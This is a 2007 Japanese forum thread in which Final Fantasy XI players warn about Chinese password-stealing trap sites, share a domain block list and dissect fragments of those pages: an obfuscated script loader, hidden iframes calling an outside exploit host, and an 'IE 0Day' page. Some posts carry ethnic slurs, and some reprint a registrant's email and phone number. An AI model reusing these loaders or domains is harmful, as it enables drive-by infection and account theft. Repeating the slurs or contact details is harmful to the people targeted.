前々から不満もあったのでこの機会に移転しちゃいます
××tp://mbspro6uic■com/yutangff/ffzuotu■jpg
-----------------------------------
あやしいサイトはソースチェッカーで調べましょう。
ttp://so.7walker.net/guide.php
もっと厳格に言うと、上記ソースチェッカみたいなリンクも、分からなければ踏まないほうがいいと思う。
グーグルで”ブラクラチェッカー”とか検索するのがベター。
265 :既にその名前は使われています:2007/10/16(火) 01:26:00.84 ID:yhgaGjN0
ICPOの出番マダー?
266 :既にその名前は使われています:2007/10/16(火) 02:15:28.80 ID:X2F9wGKW
これはどう対処すればいいんかなぁ
■に通報トカカネ?
267 :既にその名前は使われています:2007/10/16(火) 02:30:58.96 ID:cHZ+9+L6
対処は個々人でセキュリティアップと危機感持ってネットするしかないんだろうな
と言いつつ、自分も素人レベルなんで参考にしてみたサイトをピックアップしてみる
他MMOのサイトだけど被害内容は同じ、対策として読むのにどぞ
http://wannabe.fam.cx/service/link.cgi?http://www.mc.ccnw.ne.jp/kumakuma-sakura/ragna-security/ragna-security.htm#SStag
ブラウザの設定、よくわからんって人にどぞ
http://wannabe.fam.cx/service/link.cgi?http://www.affrc.go.jp/ja/info/kenshu/INTRO/2_browser_1.html
上のリンク先に不安のある人は上で紹介してくれたサイトで調べてみよう!
>>222 より
怪しいURLは先にこれで調べる!これが勝利のカギだ!
■aguse.net
http://wannabe.fam.cx/service/link.cgi?http://www.aguse.net/
268 :既にその名前は使われています:2007/10/16(火) 02:47:04.11 ID:6f+ohICl
今日コピペはりつけてるのは
ID:SCechboh
の模様、気をつけたし
269 :既にその名前は使われています:2007/10/16(火) 02:47:56.67 ID:Uor/OgYr
489 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 02:40:05.65 ID:SCechboh
FF11史上の最も強い日記
詳しい情況は見る
http://wannabe.fam.cx/service/link.cgi?http://tinyurl.com/35vg2o
491 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 02:41:19.17 ID:SCechboh
FF11/FFXI全く新しいです武器.防具一覧
詳細はリンク先ページを参照下さい。
http://wannabe.fam.cx/service/link.cgi?http://tinyurl.com/33oht5
って中華が鯖スレにもきたよー
270 :既にその名前は使われています:2007/10/16(火) 02:51:21.90 ID:mAix3oxf
315 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 02:43:47.21 ID:SCechboh
FF11狩場,攻略,販売,BBS,武器防具製作
URL: http://wannabe.fam.cx/service/link.cgi?http://www■sakerver■com/wiki/
FF11公式ページ。FF11狩場 スクリーンショット,ヒンデミットサーバー所属のドワーフによる武器、防具製作.FF11記者 FF11攻略 FF11販売
http://wannabe.fam.cx/service/link.cgi?http://www■sakerver■com/wiki/
271 :既にその名前は使われています:2007/10/16(火) 02:53:34.75 ID:PW6pzeCH
>>264
やっぱエキサイトのそれスパムかねぇ。
この前踏んだけどなんも反応なかったから意味不明だったんだが。
まぁPS2組だから関係ないけど。
272 :既にその名前は使われています:2007/10/16(火) 02:54:03.72 ID:nZV52vKh
ヒンデミットサーバーってどこなんだよ('A`)
273 :既にその名前は使われています:2007/10/16(火) 02:54:41.37 ID:Uor/OgYr
ドワーフ実装かよw
274 :既にその名前は使われています:2007/10/16(火) 02:55:09.31 ID:5DTfD3A6
>>269
直で繋がるのはヤバイってwww
頼むから削ってくれ。
275 :既にその名前は使われています:2007/10/16(火) 02:55:55.10 ID:nZV52vKh
つか、直で貼るやつは中華と同罪だぞ…('A`)
276 :既にその名前は使われています:2007/10/16(火) 02:56:03.71 ID:mAix3oxf
>>270は「お兄ちゃんは悪くない」スレに投下されたもの
中華さん何でそんなスレ選んでるの^^^;;;;;;
277 :既にその名前は使われています:2007/10/16(火) 02:59:07.40 ID:Uor/OgYr
>274-275
すまん
278 :既にその名前は使われています:2007/10/16(火) 03:02:20.78 ID:nZV52vKh
罰としてナジャ社長で1本抜いてこい
ミリでもいいぞ、ただしアフマウは許さんが('A`)
279 :既にその名前は使われています:2007/10/16(火) 03:05:04.68 ID:7kVGlWN7
とりあえずtinyurlに飛んでpreview feature→URLに飛ぶ前に一度確認する機能をenable ってしとけよ
これでURL変換の奴は回避できるから
後firefoxならリンクにカーソル持ってくと窓下部にURL先出るから
これも活用すれば大丈夫だろう、wiki見なければ。
下手なソフトに頼るより自分でできる事した方がずっと効果的
280 :既にその名前は使われています:2007/10/16(火) 03:05:09.77 ID:7QCjZTF0
ゲーム内で中華みかけなくなったと思ったら今度は
その周辺かよ。
うぜー。まじうぜー。あいつらマジで絶滅すりゃいいのに。
281 :既にその名前は使われています:2007/10/16(火) 03:11:39.78 ID:7kVGlWN7
後変な物踏んだ!と思ったらすぐ回線抜け
間違っても回線繋いだままだらだらしないようにするんだ
282 :既にその名前は使われています:2007/10/16(火) 05:20:09.01 ID:5LRHx3ia
ほす
283 :既にその名前は使われています:2007/10/16(火) 05:37:14.59 ID:5DCICMq9
質問!
このスレタイ通りパス抜かれたかったっぽいんだけど、どうしたら良いかな?
かなり焦ってて…
■に電話したらまたFFできるかな?誰か助けて(T_T)
284 :既にその名前は使われています:2007/10/16(火) 05:39:28.45 ID:pDgo4EFy
25時間ログインしてればあっちはインできないんじゃね?
285 :既にその名前は使われています:2007/10/16(火) 05:40:15.60 ID:5DCICMq9
まずいな、上手く日本語書けてないw
パス抜かれちゃったっぽい です。
286 :既にその名前は使われています:2007/10/16(火) 05:40:21.56 ID:KckLGoqC
>>283
もっと状況を詳しく話せ。
287 :既にその名前は使われています:2007/10/16(火) 05:41:12.90 ID:mAix3oxf
>>284
後からログインしたほうが優先されて先にログインしていた端末は落とされる
288 :既にその名前は使われています:2007/10/16(火) 05:44:56.35 ID:y+JIyURH
逆に考えるんだ、FFをやめるための手助けをしてくれてると!
289 :既にその名前は使われています:2007/10/16(火) 05:47:43.75 ID:n3qAHWsV
中国、今年はものすごいベビーブームで病院のベッドが足りないらしいぜ。
廊下で生むような事態にもなってるとか。
一人っ子政策ってどうなったんだよ。増えすぎだろ。
まあ、中国人使ってるのは日本の怖い人なんだろうけどな。
290 :既にその名前は使われています:2007/10/16(火) 05:54:07.78 ID:MhlAKTnn
>>287
逆じゃ?
291 :既にその名前は使われています:2007/10/16(火) 05:57:38.05 ID:y3ek2zI0
>>283
パス抜かれたとは何をもって判断したわけ?
とりあえずオフィシャルにはハックに遭ったらGM呼べと書いてあるからGM呼んだら?
ま、解決しないと思うけど…
292 :既にその名前は使われています:2007/10/16(火) 06:00:24.10 ID:gTf1J0CJ
>>290
逆じゃない、リアフレとアカを共有していた時期があったんだが、キャラは別で端末もそれぞれの家に持ってた。
俺がプレイ中してる時に奴がインしてきたら俺が落とされた、多重ログインの場合は後からインしたほうが優先される。
「他の誰かがログインしているのでログインすることが出来ません、時間を置くか他にインしている人がいないかご確認ください」などの表示は一切無かったそうな。
293 :既にその名前は使われています:2007/10/16(火) 06:09:43.44 ID:MhlAKTnn
>>292
フレリスト見られるツールだと後から起動しても入れないからそうだと思ったんだけど
後から入った方が優先されるって多重ログインの制御できてないとしか思えない・・・
294 :既にその名前は使われています:2007/10/16(火) 06:10:07.73 ID:H4gp1iop
volume@rondo.ocn.ne.jp
ヤフオク詐欺師 通報しといた。
295 :既にその名前は使われています:2007/10/16(火) 06:15:26.97 ID:MKmjjcZX
>>292
>「他の誰かがログインしているのでログインすることが出来ません、時間を置くか他にインしている人がいないかご確認ください」などの表示は一切無かったそうな。
これって「他の誰かが〜」じゃなくて「既にそのキャラクターは〜」だろ
クライアント側が落ちて最速で復帰させると表示される
>>293
後入り優先にしないとダメだろ
自分以外が不正にログインしたら対処手段が0になる
296 :既にその名前は使われています:2007/10/16(火) 06:18:55.11 ID:MhlAKTnn
>>295
自分がログインしてて後から不正ログインされるのは?
297 :既にその名前は使われています:2007/10/16(火) 06:19:05.04 ID:adby4ThT
2年前のノートン使ってるんですけどやばいですか?
298 :既にその名前は使われています:2007/10/16(火) 06:20:52.39 ID:MKmjjcZX
>>296
再ログインしなおせばおk
299 :既にその名前は使われています:2007/10/16(火) 06:22:02.40 ID:MhlAKTnn
>>298
それ、ただのイタチごっこじゃん
300 :既にその名前は使われています:2007/10/16(火) 06:23:28.64 ID:MKmjjcZX
>>299
後入り不可にするとそのいたちごっこすら不可能なわけで
自分がログインしてない時に他人が不正にログインしたら一貫の終わりになっちまうんだぜ?
301 :既にその名前は使われています:2007/10/16(火) 06:23:46.44 ID:Uor/OgYr
POLにはかぶっててもログインできるので
そこでパスかえるかGMよぶかしとけ
302 :既にその名前は使われています:2007/10/16(火) 06:24:58.46 ID:MhlAKTnn
>>300
だから「IDとパスワードは厳重に管理して下さい」だと思うんだけど
303 :既にその名前は使われています:2007/10/16(火) 06:26:48.26 ID:S9DgbTa2
赤玉出して落ちるとすぐには入れなかったよね?
いたちごっこになった時は線抜いて落ちてパスワードを変えてログインが今のところ最良?
304 :既にその名前は使われています:2007/10/16(火) 06:27:56.41 ID:gTf1J0CJ
元々アカウントの共有は規約違反、パスやID抜かれたのは自分のミス。
最初っから多重ログインを想定してないんじゃないかね。あくまでもイレギュラーな事態なんだし。
305 :既にその名前は使われています:2007/10/16(火) 06:28:13.42 ID:Uor/OgYr
業者にパス変えられる前にPOLログインして
気休めにパス変えてGMコール
それもできない段階ならサポセンに電話
306 :既にその名前は使われています:2007/10/16(火) 06:30:19.46 ID:B1s7+j/y
>>303
もしキーロガーとか使われてたら効果薄いけどなぁ、やらないよりは良い。
まず落ち着いて、ウィルスとスパイウェアチェックしてからパスを変更かな。
307 :既にその名前は使われています:2007/10/16(火) 06:34:37.11 ID:mAix3oxf
スパイウェア対策ソフト教えてくれ
spybotはバグ多すぎてだめだわ
308 :既にその名前は使われています:2007/10/16(火) 06:39:55.86 ID:SD/jYCjO
>>305
のID危ないのでアボンでもするかな。
309 :既にその名前は使われています:2007/10/16(火) 06:40:53.68 ID:LSFdGJt4
>>292
だね。
別の端末から同じアカで入ると、その時ログイン中のプレイヤーは強制的にログアウト食らう。
BC戦闘中に、フレが回線落ちして帰ってきたと思ったら中の人が【素人】に変わってて全滅したこともあったわw
310 :既にその名前は使われています:2007/10/16(火) 06:42:10.77 ID:gTf1J0CJ
>>283まだ見てるか知らんが
>>168-169>>193とかを参考に
あと危なそうなurlはここでチェック汁
■aguse.net
http://wannabe.fam.cx/service/link.cgi?http://www.aguse.net/
311 :既にその名前は使われています:2007/10/16(火) 06:47:41.47 ID:gTf1J0CJ
と、ここで↑にURLを踏んだ人は要注意。せめてURLをググる位はしたほうがいいと思う。
いや安全なサイトなんだけどねw
312 :既にその名前は使われています:2007/10/16(火) 07:16:15.66 ID:pvxPWcjj
>>272-273
これリネIIの情報を改変しただけじゃね?('A`)
313 :既にその名前は使われています:2007/10/16(火) 07:20:36.08 ID:Vd4L1EgX
ブログやってる奴も、コメントのURL欄消して、
本文の拒否設定とか禁止設定に「http」入れようぜ。
そしたらまあ小中国人どももh抜きで書き出すだろうけど、
自動リンクされなてなければ読者もドメインでおかしいとわかるだろ。
314 :既にその名前は使われています:2007/10/16(火) 07:22:22.88 ID:jTqJcCaj
これはあげなきゃでしょう
315 :既にその名前は使われています:2007/10/16(火) 07:25:08.67 ID:cHZ+9+L6
うちも罠コメ付いてた
内容
両手武器は劇的に変わったった。
STR=攻1 DEX=命中1になった事で
肉食もできて更にパワーうp。
上で書いててくれた人がいたんですぐ分かったよ、thx
夏頃にも中華爆撃あった時は、本文中にURLがはってあったんでいかにも怪しそうだったけど
今回のは投稿者の名前にアドレスがリンクされてるだけなんで逆に引っかかりやすいかも
でもさー
うちFFのブログじゃないんだよね…
(FF関連の記事は一切なし)
知り合いのFFブログを何件かリンクしてるから、そこから来たのかな
とりあえずコメントを承認制にして対処した
316 :既にその名前は使われています:2007/10/16(火) 07:42:42.96 ID:a2a7cwVl
いまさら聞けない〜スレにも早朝から来てたよ、中華
↓本当になりふりかまわなくなってきてるね…
--------------------------------------------
955 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 05:07:53.09 ID:SKKjLl6V
ttp://www●k5dionne●com/ 中国語だけどよめる?
本当はhttp:// www●k5dionne●com/ ffzuotu●jpg
なんだけど中国からFFパス抜くやく? ↑にffと中国だからそう思っただけで
317 :既にその名前は使われています:2007/10/16(火) 07:50:00.79 ID:YJX/lSLi
Avasta入れてみたらトロイみつかった
こわいからPSでパス変えて今出社 帰ったら本格的に駆除しよう思うんだけど
修復できんかったらファイル削除だけでいいのかな?
318 :既にその名前は使われています:2007/10/16(火) 07:59:34.79 ID:NImg7AO6
ウィルスバスターじゃ検索しきれない?
319 :既にその名前は使われています:2007/10/16(火) 08:11:23.24 ID:gi39A9Yk
>>318
バスター使ってるならURLフィルタの禁止するWebサイトに登録しとけ
そうすれば誤って踏んでも開かないから、それにその行為がトレンドマイクロに通報する事にもなる
登録する時に間違って踏むなよ
320 :既にその名前は使われています:2007/10/16(火) 08:20:54.79 ID:BrfuAMzc
>>317
トロイが見つかったのなら、HDをクリーンインストールした方がいいよ
321 :168:2007/10/16(火) 08:29:13.46 ID:ur0bgfcq
一昨日践んで昨日仕事から帰ってから速攻でホコリかぶってたPS2引っ張り出してパス変えました
最終ログイン時間をみた感じだと無事みたいです
とりあえずPCを再セットアップ
ホント中国人はろくなことしないな
322 :既にその名前は使われています:2007/10/16(火) 08:38:31.81 ID:BrfuAMzc
>>321
乙
被害なくて良かったな
323 :既にその名前は使われています:2007/10/16(火) 08:46:19.08 ID:TBFr8om6
>>321
ここまで派手に活動していたら踏む奴1人や2人ではないだろう
他の奴の垢が処理されているうちにお前はパスワードの変更ができたんだろうな
324 :既にその名前は使われています:2007/10/16(火) 09:08:07.26 ID:Qy6vgiqe
>>106です。手持ちのノートン2007とシマンテックのオンラインスキャンをしましたが、何も検出されませんでした。
ネカフェでパスも変更しましたが、検出されていないキーロガーとか有りそうで逆に怖いです。
ほかにやって置くべきことはありますか?このスキャンの方が信頼できる、とか
325 :既にその名前は使われています:2007/10/16(火) 09:12:17.14 ID:IghRgcRr
ネカフェでパス変更って一番やばいだろ・・・なんで自ら危険な領域に踏み込むんだ
326 :既にその名前は使われています:2007/10/16(火) 09:13:08.33 ID:2suVJgtX
かなり深刻な問題になってきているようだな
327 :既にその名前は使われています:2007/10/16(火) 09:19:38.13 ID:MXbjEJAw
とりあえず、バスターのURLフィルタ登録用リストを作ってみた
tp://www■blogplaync■com/
tp://www■xiaoriben■net/
tp://mbspro6uic■com/
tp://tinyurl■com/
tp://www■sakerver■com/
tp://www■k5dionne■com/
とりあえず、このスレに出てきた奴だけ
当然、これ以外にもヤバイサイトはあるだろうけど
頭にhtを入れて、/を半角に置き換え、■を.に置き換えるとヤバイサイトのURLになる
間違っても踏んだり、踏ませたりしようとするなよ・・・
328 :既にその名前は使われています:2007/10/16(火) 09:20:36.29 ID:F+6bcken
Blog持ちはコメントを公開許可制に変更した方がいい。
リアルタイム性は落ちるが、事前チェックが出来るだけでも遙かにマシ。
自分のサイトから被害者を出さないためにも今すぐ変更しとけ。
329 :既にその名前は使われています:2007/10/16(火) 09:30:16.96 ID:iM3lOWgO
<script language="javascript">var www_ucmm_cn="%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3EHello%21%3C/title%3E%0D%0A%3Cmeta%20name%3D%22author%22%20content%3D%22%u8
FF7%u7F51%22%20/%3E%0D%0A%3C/head%3E%0D%0A%3Cbody%3E%0D%0A%3Cscript%20langua
0D%0Awindow.onload%20%3D%20init%3B%0D%0A%3C/script%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E";www_ucmm_cn=unescape(www_ucmm_cn);document.write(www_ucmm_cn);</SCRIPT>
パス抜きサイトとか言われてるののソースの一部なのだが、これでパス抜けるのか?
書いてる内容がわかる奴、説明してくれ
330 :既にその名前は使われています:2007/10/16(火) 09:38:22.04 ID:y3ek2zI0
パス抜きの仕組みがよくわからんのだが、
オートログイン用に保存したデータからパスを抜いてるとか?
オートログイン設定じゃなければ被害には遭わないのだろうか
331 :既にその名前は使われています:2007/10/16(火) 09:46:52.56 ID:zu1PJ9rz
オートじゃなくても送信すれば同じことじゃね
入力した時点で読み取るスパイウェアもあることだしなー
332 :既にその名前は使われています:2007/10/16(火) 09:51:52.77 ID:TxLzMS4P
>>277
詩ねよチョンコ
333 :既にその名前は使われています:2007/10/16(火) 10:00:10.45 ID:GC85tEC3
>>329
>>263 でも書いたけど
そのコードは、バッファオーバーフローが発生し、遠隔からコマンド実行される恐れがあるコード
ダウンローダを仕込まれてから盗まれるんじゃないかな?
単純なURLエンコードだから、%3C → <、 %3E → > 等にデコードしてやると
<html><head><script>・・・みたいに html ソースが浮き出てくるよ
ちなみに<meta>タグ内に中国語ぽい言葉で『迷网』(%u8FF7%u7F51の部分)と書かれていたからexciteで訳したら『ネットに迷います』だってさ。
なめてやがるw
334 :既にその名前は使われています:2007/10/16(火) 10:18:21.76 ID:KdIEzkfq
ウイルスバスター2006のURLフィルタと個人情報保護機能は一部のブラウザにしか対応していません。
しかし、OperaやIEコンポーネントブラウザを使用している方など、対応させたい方も居るでしょう。
そういうときはレジストリを弄ることで「サポート対象外」ながらも対応させることはできます。
■■■■■■■■■注意■■■■■■■■■
レジストリの改変は危険を伴う操作です。
間違えると最悪Windowsを破壊してしまいます。
ここから先の操作は自己責任でお願いします。
■■■■■■■■■■■■■■■■■■■■
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\NSC\TmProxy\ProtocolHandler\http\redirectに
Operaだったら「Opera」という名前で新規キーを作成して、既にあるAOLとかIEの例を参考にすれば
対応させることができます。
ちなみに、2005は、
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\TmProxy\ProtocolHandler\http\redirect
に同様の操作をすれば対応させることが可能です。
---
セキュ板の昔のバスターのテンプレよりコピペ
2007でも2006と同じやり方で可。書き加えた後リブートしましょう
335 :既にその名前は使われています:2007/10/16(火) 10:23:28.57 ID:/XSViLpQ
てか普段みんなJavaとかActivexきってHPみてないの?
昔の人間だとこれ結構当たり前だと思ってたんだが・・・・
まぁflashとか使ってるサイトはヘイト大になるんだけどさw
336 :既にその名前は使われています:2007/10/16(火) 10:28:43.20 ID:ddJgkC0R
うちのブログに
ttp://ff11link.blog122.fc2.com
なURL張ってあったんだけど・・罠サイト?
337 :既にその名前は使われています:2007/10/16(火) 10:28:51.67 ID:zu1PJ9rz
俺はダイアログを表示するにしてる
毎回ウゼーがもう慣れた
そのせいか未だにスクエニ公式まともに見れたことないw
338 :既にその名前は使われています:2007/10/16(火) 10:29:29.02 ID:UqVBJjOL
>>336
URLけずれっていってんだろうが!糞業者が!!!!!1111
339 :既にその名前は使われています:2007/10/16(火) 10:32:58.72 ID:qdE71hjD
「javascript」を切るとかなり鬱陶しいことになるが
「JAVA」はほとんど困らない。JAVAを必要とするサイトは少ない
340 :既にその名前は使われています:2007/10/16(火) 10:32:59.29 ID:ICfHr6ms
>>336
業者乙
341 :既にその名前は使われています:2007/10/16(火) 10:33:50.46 ID:qdE71hjD
ActiveXは論外。こんなもの要求するサイトは絶滅して欲しい
342 :既にその名前は使われています:2007/10/16(火) 10:36:49.09 ID:/XSViLpQ
>>339
いや、そんなこと得意げに説明されても普通みんなわかるだろ;;
まぁうっとうしいが、それでもへんな罠を回避できるにのは大きいからなぁ・・・
俺は公式はジョブ戦略板飛んでそこから公式リンクたどっていつも見てるな
まぁお気に入りにいれちまえば一発なんだが。
343 :既にその名前は使われています:2007/10/16(火) 10:38:50.93 ID:05SVTd3Q
自分の常識はみんなの常識とは限らんぞw
344 :既にその名前は使われています:2007/10/16(火) 10:42:17.66 ID:Q7gSgDUb
リネとROには垢ハック対策のまとめサイトがあるんだがFFにはないんだよな。
危険URLとかは全部リネのページを参考にしてる。
345 :既にその名前は使われています:2007/10/16(火) 10:43:04.48 ID:GC85tEC3
>>336 は罠サイト
ID:ddJgkC0R ← あぼーん推奨
346 :既にその名前は使われています:2007/10/16(火) 10:48:09.69 ID:/XSViLpQ
>>343
たしかになw失礼した;;
まぁ話の論点ずれたが一番の問題は普通のサイト
装ったり、wiki改ざんしたりとその手口が許せないってところだな
347 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 10:50:09.57 ID:l6Djc+Ck
>>336
<iframe width=100 height=0 src=http://www■yyjjoopp■com/main.htm></iframe>
<iframe width=600 height=1200 src=http://www2u■biglobe■ne■jp/~K340/ff11/></ifram
e>
Domain name: yyjjoopp■com
Registrant Contact:
Chensuzuki Network
Network Chensuzuki suniuqing001@163■com
13559988127 fax: 13559988127
Fujianlongyan
longyan Fujian 364000
cn
どう見ても中華です。本当にありがとうございました。
348 :既にその名前は使われています:2007/10/16(火) 10:52:12.95 ID:pohH9quR
どういう仕組みで抜いてるのか素人にはわからんのだが、
パス記憶させてなければ一応は大丈夫なのか?
349 :既にその名前は使われています:2007/10/16(火) 10:52:15.79 ID:K4ru9bn+
低脳なお前らが最高の獲物だよな。
350 :既にその名前は使われています:2007/10/16(火) 10:53:35.51 ID:trrJNVgd
WebWarez時代を駆け抜けてきた厨房連中は、守る術を自ら学んだものだけど
最近の連中はセキュリティーを守るすべを学ぶ機会が無いから、簡単な罠に引っかかっちゃうんだろうな・・・
351 :既にその名前は使われています:2007/10/16(火) 10:54:40.05 ID:6XmhKUYc
つうか、FF11の公式サイトムカつく!!
JAVA、アクティブX使いすぎだボケwwwwwww
352 :既にその名前は使われています:2007/10/16(火) 10:55:40.03 ID:22SLr4/7
今回罠を踏んだ奴で無料ウィルスチェックソフトで検出することが出来た奴居る?
ノートンやバスターは当然としてFFマシンにはコストの関係から意図的に製品を入れてない奴も居るだろうし
AVG、Spybot、Ad-aware、avast!で何でドレが引っかかったの情報共有した方がよさろう
俺の環境はAVGとAd-awareで未検出
WindowsUpdateやってるからそもそも引っかからなかった気がする
353 :既にその名前は使われています:2007/10/16(火) 10:56:32.71 ID:zu1PJ9rz
>347
@163■com ここからよく迷惑メール大量に来てたな
シナからの通信遮断してくれマジで
354 :既にその名前は使われています:2007/10/16(火) 10:56:52.81 ID:y3ek2zI0
336のリンク先は
aguse.netだと普通のfc2ブログに見えるんだが
どこで罠と判別できるんだ?
355 :既にその名前は使われています:2007/10/16(火) 10:59:28.75 ID:Z28ulux4
プレステでげーむしろ
356 :既にその名前は使われています:2007/10/16(火) 11:01:22.77 ID:mFNMB9D+
>>355
せめて凶箱360にしてくれw
そろそろ消えてなくなりそうなそんな古いゲーム機使っとれんwwww
357 :既にその名前は使われています:2007/10/16(火) 11:02:24.07 ID:KExOpnie
PS2組で良かったと思いつつ・・・業者死ねage
358 :既にその名前は使われています:2007/10/16(火) 11:02:46.94 ID:mFNMB9D+
つうか、マジで凶箱360に乗り換えようと思うんだが、
360用のボタン、アナログスティックがPS2配列のパッドって売ってない?
本体は持っているが、パッド使いにくくて最近触ってねー
359 :既にその名前は使われています:2007/10/16(火) 11:03:40.41 ID:GC85tEC3
>>352
言い出しっぺがやれw
とりあえず↓で十分。今のところ、リネ同じやつしかないよ (微妙な改竄はされてるけど)
ttp://lineage.nyx.bne.jp/misc/security/id_virus-sample.html
>>354
ソースは >>347
表示されているのとは別フレームで yyjjoopp.com を呼び出している。
360 :既にその名前は使われています:2007/10/16(火) 11:07:38.43 ID:TxLzMS4P
>>336
死ね
361 :既にその名前は使われています:2007/10/16(火) 11:08:34.08 ID:tTI4UwuO
avast!でURL踏んだ瞬間反応したかも
Loveletter-C[Wrm]ってこれかな?
壷でavast!が反応してるっぽいから間違いは無いんだろうけども
セキュリティソフトのログ見ると同時にノートンでも検出してるっぽいね。
362 :既にその名前は使われています:2007/10/16(火) 11:09:24.18 ID:3UEf/Ns1
>>354
携帯から見たら記事もタイトルもないブログだった。
恐らくはfc2の垢を普通に取って、中身のいろんなリンクを全部アカハックアドレスに
繋いでいるのだと思われ。
ちょっと昔に似たようなのがエキサイトでもあった。
垢をやっぱり普通に取って、記事はどこぞの攻略系ブログからコピペ、
そのうえであらゆるリンクが罠サイト逝きという…。
無論今は退会処分食らって消えてるはず。
363 :既にその名前は使われています:2007/10/16(火) 11:11:03.13 ID:086gG1tR
ttp://live25.2ch.net/test/read.cgi/ogame/1192452964/
狼鯖、FFの癌です。皆様一読お願い致します<m(__)m>
364 :既にその名前は使われています:2007/10/16(火) 11:11:06.45 ID:GC85tEC3
>>361
これまたすげー懐かしい Virus だなww
昔のとは違うのかな? ちなみにどこを踏んだん?
365 :既にその名前は使われています:2007/10/16(火) 11:11:08.99 ID:YJX/lSLi
wiki見る分には問題ないのんだよね?そこからの怪しいリンク飛んだら感染てこと?
366 :既にその名前は使われています:2007/10/16(火) 11:12:03.61 ID:3UEf/Ns1
うあ、ちゃんと端的な解説されてたw
リロード汁自分…
367 :既にその名前は使われています:2007/10/16(火) 11:13:21.67 ID:y3ek2zI0
>>659 >>362
うは、マジか…
fc2にFFブログ多いのに、怖くて見れねえじゃん
とりあえずfc2に通報しとく
368 :既にその名前は使われています:2007/10/16(火) 11:13:24.88 ID:KdIEzkfq
>>365
よく見ると改組されてる事があるから怪しくなくても飛び先を確認
369 :既にその名前は使われています:2007/10/16(火) 11:18:05.67 ID:x00Iu9Dl
最近のトロイはマジやばいんだよ
現状のセキュリティソフトじゃ全く歯が立たない
何かが検出されて「ほとんど影響なし」とか出ても、それは安心させるための
カモウィルスと思え
370 :既にその名前は使われています:2007/10/16(火) 11:18:25.79 ID:tTI4UwuO
>>364
エル尻スレあたりだったか?
多分安田美沙子?の写真貼られてたものから検出
定期的に通ってるスレなんだ(´・ω・`)
371 :既にその名前は使われています:2007/10/16(火) 11:21:10.89 ID:tTI4UwuO
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
tp://www■k5dionne■com/ffzuotu■jpg
御尻が見えた気がしたんでs;;
372 :既にその名前は使われています:2007/10/16(火) 11:24:29.31 ID:GC85tEC3
>>365
wiki の設定やバージョンによっては見るだけでも問題が発生する場合があるので注意
(FFの罠サイトで wiki の脆弱性をついているのは俺は見たことがないけど)
とりあえず↓をしっかりやれば基本的に問題ないよ
1. Windows Up Date をする (現在は基本的に月1回)
2. AntiVirusソフトの定義ファイルを更新する (毎日)
3. ActiveX,JavaScript,VBScript を off にする
注意点
・ステータスバーは最新パッチ適用済み IE でも改竄ができるのであまり信用しない
・短縮URLで一見わかりにくくなっている場合がある
・.jpg 等であってもリダイレクトされる事がある
>>371
サンクス今から見てくる
373 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 11:33:22.38 ID:l6Djc+Ck
今張られている罠サイトって、ほとんどがリネージュ資料室に書かれてるドメインばっかりです。
なので、hostsを使って罠サイトをローカルに向けるだけでかなり防げるんじゃないでしょうか。
374 :既にその名前は使われています:2007/10/16(火) 11:36:51.12 ID:y3ek2zI0
fc2ブログを擬態した罠サイトがあったら
ここから削除依頼できるんで皆も通報よろすく
ttp://form1.fc2.com/form/?id=49541
375 :既にその名前は使われています:2007/10/16(火) 11:37:33.61 ID:Hym7OGsF
>>348みたいなのはWinnyで個人情報流出しまくってそうだな
つーかレジストリの存在ぐらい知っとけおまいら
376 :既にその名前は使われています:2007/10/16(火) 11:39:36.49 ID:GC85tEC3
>>371
ごめん勇気を振り絞ってエロ暴露してくれたのにww
今の俺の環境だと sanffm.htm がもってこれないorz
とりあえず、jpgに見せかけているだけで、画像はgif、sanffm■htmまで呼び出しているから
罠サイトだと思っていいと思う。
↓↓↓ソース↓↓↓
<html>
<iframe src="sanffm■htm" height=0 width=0></iframe>
<img src="gss■gif"></center>
</html>
377 :既にその名前は使われています:2007/10/16(火) 11:41:19.55 ID:khBMfGCh
次スレに移行するようなことになったらスレタイにURL削れって入れね?
【URLは】中華系罠サイトへのリンク警報2【削るか変更】
とかこんなので、1にテンプレで
http://wannabe.fam.cx/service/link.cgi?http://www.xxx.com/yyy/ は ttp://www■xxx■com/yyy/
のように全角文字や記号でリンク踏めないようにしろ、とかさ。
俺はネット専用PCにMacintosh(OS9www)使ってるしFFXI専用PCは
月に1〜2回くらいOSのクリーンインストールもして自衛してるけど
自分のブログに張られた罠サイト踏んじゃう読者がいるんじゃないかと思うと
他人事には思えないんだよな(´Д`;
コマメにチェックして削除してはいるけどな・・・たまにいるんだよ踏んじゃうヴォケが・・・
378 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 11:47:13.65 ID:l6Djc+Ck
>>376
sanffm.htmの中身
<html>
<head>
<meta http-equiv=";Content-Type" content="text/html; charset=US-ASCII"
/>
<title>super IE 0Day</title>
</head>
<body>
以下、謎のバイナリコード
super IE 0Dayとか書いてあるけど、IEの脆弱性をつくコード入りなのかもね。
379 :既にその名前は使われています:2007/10/16(火) 12:01:53.92 ID:fuv7QfAB
http://wannabe.fam.cx/service/link.cgi?http://d.hatena.ne.jp/keyword/Super%20IE%200day
Super IE 0dayってこれだね
なんかひどい状態やね
380 :既にその名前は使われています:2007/10/16(火) 12:12:37.38 ID:ZTsM7CV9
報復手段は無いものかね。やられっぱなしは悔しいんだぜ?
381 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 12:23:31.71 ID:l6Djc+Ck
>>380
国家としてアタックをするようなところですから。
個人的な報復はむずかしいでしょうね。
現状、自衛をしっかりするのが最良の方法かと。
382 :既にその名前は使われています:2007/10/16(火) 12:26:44.17 ID:7lOzvimz
>>380
RMTや垢売買に関わらない
383 :既にその名前は使われています:2007/10/16(火) 12:29:26.42 ID:Il2PW/Et
日本海の海底ケーブルを切断する!
384 :既にその名前は使われています:2007/10/16(火) 12:30:33.95 ID:yhgaGjN0
中国公安部に「将来中国共産党の統率を乱す恐れがある組織」という内容で通報する
385 :既にその名前は使われています:2007/10/16(火) 12:31:16.19 ID:fuv7QfAB
